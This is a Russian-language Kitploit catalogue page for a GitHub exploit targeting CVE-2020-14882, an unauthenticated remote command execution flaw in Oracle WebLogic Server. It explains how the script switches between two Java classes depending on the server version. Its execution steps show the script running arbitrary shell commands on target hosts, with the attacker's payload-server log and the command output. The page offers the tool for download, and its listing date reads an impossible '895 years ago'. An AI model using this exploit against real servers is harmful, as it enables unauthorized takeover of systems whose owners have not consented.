Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-14882 — CVE-2020-14882 | Kitploit
Инструменты/GitHubGitHub/milo2012/cve-2020-14882
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlPayload Development
GitHubmilo2012/cve-2020-14882

CVE-2020-14882

CVE-2020-14882

Репозиторий
895 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-14882

CVE-2020-14882

Описание

Уязвимость в продукте Oracle WebLogic Server из состава Oracle Fusion Middleware (компонент: Console). Затрагиваются поддерживаемые версии: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 и 14.1.1.0.0. Уязвимость легко эксплуатируется и позволяет неаутентифицированному злоумышленнику с доступом по HTTP скомпрометировать Oracle WebLogic Server. Успешные атаки могут привести к захвату WebLogic Server.

Различие

Для версий Oracle WebLogic до 12.2.1 необходимо использовать класс 'com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext' вместо 'com.tangosol.coherence.mvel2.sh.ShellSession', так как последний отсутствует.
Скрипт автоматически переключается между двумя классами для выполнения команд в зависимости от обнаруженной версии.

Некоторые из текущих скриптов, доступных на GitHub для эксплуатации CVE-2020-14882, поддерживают только класс 'com.tangosol.coherence.mvel2.sh.ShellSession', что приводит к их сбою на версиях WebLogic 10.3.6.0.0 и 12.1.3.0.0.

Шаги выполнения

root@kitploit:~
% python3 CVE-2020-14882.py -u http://172.16.164.134:7001 -c 'uname -r > /tmp/success' -i 172.16.164.1
[*] http://172.16.164.134:7001/console/login/LoginForm.jsp [version 12.1.3.0.0]
[*] Using: com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
root@kitploit:~
% python3 CVE-2020-14882.py -u http://127.0.0.1:7001 -c 'uname -r' -i 172.16.164.1
http://127.0.0.1:7001/console/login/LoginForm.jsp
[*] http://127.0.0.1:7001/console/login/LoginForm.jsp [version 12.2.1.3.0]
[*] Using: com.tangosol.coherence.mvel2.sh.ShellSession
Linux 96fc5d43736b 4.19.121-linuxkit #1 SMP Tue Dec 1 17:50:32 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
Скачать инструмент